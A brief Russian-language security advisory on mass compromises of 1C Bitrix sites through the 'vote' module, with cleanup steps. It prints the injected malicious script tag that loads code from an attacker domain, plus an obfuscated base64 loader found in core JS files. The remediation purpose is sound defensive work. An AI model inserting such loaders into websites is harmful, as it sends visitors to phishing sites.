Информационная безопасность

Массовый взлом CMS 1С Bitrix (ошибка 500 на сайте). В настоящий момент наблюдается всплеск взломов CMS 1С Bitrix. Злоумышленники используют уязвимость в модуле «vote» CMS Bitrix до версии 22.0.400, которая позволяет записать произвольные файлы в уязвимую систему посредством отправки специально сформированных пакетов. В настоящий момент вредоносная вставка была добавлена злоумышленником с ошибкой, в строке кода был добавлен знак переноса "\n", что вызывает критическую ошибку на сайте (ошибка 500). Как должен был работать данный сценарий: Злоумышленник загружает на веб-сайт модифицированный файл (/bitrix/modules/main/include/prolog.php), в который добавляется строка -\n<script src="https://storejscdn.pw/jqueryui.js"></script>;(домен может изменяться). Эта строка кода вызывает удаленный скрипт jquery-ui.js. В коде jquery-ui.js , написано условие, что, если переход пользователя на зараженный сайт осуществлен из поисковой системы в первые за сутки, то открывается URL-адрес otrasoper[.]ga/help/?23211651614614, который осуществляет переадресацию пользователей российского сегмента сети Интернет на фишинговые сайты различных маркетплейсов. Как исправить ? Нужно, отредактировать файл /bitrix/modules/main/include/prolog.php удалив из него строку \n<script src="https://storejscdn.pw/jqueryui.js"></script>; (домен может изменяться) Также нужно проверить наличие в файлах: bitrix/js/main/core/core.js bitrix/templates/cm_main/js/jquery-1.10.2.min.js Подобной строки: s=document.createElement(`script`);s.src=atob(`aHR0cHM6Ly90ZWNobWVzdG9yZS5wdy9qcXVlcnktdWkuanM=`);document.head.appendChild(s); Ее также следует удалить. В целях избежания повторения ситуации рекомендуем отключить или удалить модуль «vote».